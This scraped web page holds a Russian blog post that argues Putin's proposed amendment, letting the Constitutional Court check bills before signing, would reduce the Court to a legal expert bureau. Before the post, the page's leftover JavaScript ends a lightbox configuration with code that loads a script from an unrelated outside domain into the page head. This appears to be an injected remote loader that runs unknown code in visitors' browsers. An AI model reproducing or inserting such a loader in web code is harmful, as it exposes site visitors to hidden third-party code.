, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
RSS
 

Они и Конституционный Суд готовы сделать экспертной конторой

20 Янв

Ранее я неоднократно писал https://echo.msk.ru/blog/advokatvladimir/2556491-echo/   о том, что Путин, как гарант Конституции подписывает и обнародует законы, которые Конституционный Суд (КС) признаёт несоответствующими Конституции России.

Тем самым я сообщал Путину и его Администрации о низком качестве подготавливаемых законопроектов, а также непрофессионализме лиц, подготавливающих,  контролирующих и принимающих законы.

Казалось, что Путин наведёт порядок в аппарате Государственной Думы,

Министерстве юстиции и прокуратуре.

Но Путин решил иначе.

В Послании Путин предложил усилить роль Конституционного Суда, а именно: наделить его возможностью по запросам Президента проверять конституционность законопроектов, принятых Федеральным Собранием, до их подписания главой государства.

По этому поводу ещё 17 января с. г. я писал https://echo.msk.ru/blog/advokatvladimir/2572457-echo/  , что в таком случае Конституционный Суд лишается права разрешать дела о соответствии Конституции России федеральному закону, по законопроекту которого он уже дал заключение.

Казалось, что Рабочая группа по подготовке предложений о внесении поправок в Конституцию, обратит внимание Путина на это обстоятельство, но этого не произошло.

Рабочая группа по подготовке предложений о внесении поправок в Конституцию желает https://govoritmoskva.ru/news/222354/?fbclid=IwAR3AAqz_0POe8gsOjiHnlZaGJoGnKwi4C7dd_6nxoGW20IP_dE0GStdGh68     расширить компетенцию Конституционного суда в части проверки конституционности законов, принимаемых парламентом.

Это фактически означает перенос на судебную власть ответственности за то, что ошибочно  осуществили законодатели и подписал президент.

Тем самым Конституционный Суд утрачивает свои  конституционные полномочия и превращается в  экспертную организацию по правовым вопросам.

Молчит юридическая общественность, а юристов подобных Л.М. Карнеевой,  В.Н. Кудрявцеву и  В.М. Савицкому, давно уже в России нет. Поэтому  мы уже имеем вот такой проект https://www.vedomosti.ru/politics/articles/2020/01/20/821036-putin  поправок Путина в статью 125 Конституции России.

"5.1. Конституционный Суд Российской Федерации:

а) по запросу Президента Российской Федерации проверяет

конституционность законов, принятых в порядке, предусмотренном

частью 3 статьи 107 и частью 2 статьи 108 Конституции Российской

Федерации, до их подписания Президентом Российской Федерации

При этом часть 4 статьи 125 Конституции России остаётся неизменной:

«Конституционный Суд Российской Федерации по жалобам на нарушение конституционных прав и свобод граждан и по запросам судов проверяет конституционность закона, примененного или подлежащего применению в конкретном деле, в порядке, установленном федеральным законом».

Как  КС может проверять конституционность закона, примененного или подлежащего применению в конкретном деле, если он его уже признал соответствующим Основному закону страны?

Но может сложиться и такая ситуация, при которой КС может по запросу президента и не найти в нем противоречия Конституции, а потом какое-то конкретное дело докажет ошибочность решения КС. Кто в этом случае будет пересматривать ошибочность решения КС?

 
Комментариев нет

Автор: ossin Категория: Прочие заметки

 

Оставить комментарий

Вы должны войти, чтобы оставить комментарий.